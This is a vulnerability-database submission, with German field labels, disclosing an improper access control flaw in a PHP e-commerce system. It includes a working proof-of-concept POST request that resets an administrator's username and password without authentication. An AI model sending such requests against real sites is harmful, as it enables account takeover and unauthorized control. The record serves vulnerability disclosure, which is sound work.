| Titel | E-Commerce System Improper Access Control |
|---|
| Beschreibung | An Improper Access Control has been discovered in E-Commerce System, remote and unauthorized attackers could change the administrator user's name and password without authentication when the USERID is correct.
POC below:
POST /ecommerce/admin/user/controller.php?action=edit HTTP/1.1
*********************HEADER WITHOUT COOKIE********************************
USERID=127&deptid=&U_NAME=foo&deptid=&U_USERNAME=craig&deptid=&U_PASS=foo1234&U_ROLE=Administrator&save=
then the user craig's password will be set to 'foo1234' |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 20.03.2023 08:57 (vor 3 Jahren) |
|---|
| Moderieren | 22.03.2023 10:59 (2 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223550 [SourceCodester E-Commerce System 1.0 Username controller.php?action=edit USERID erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|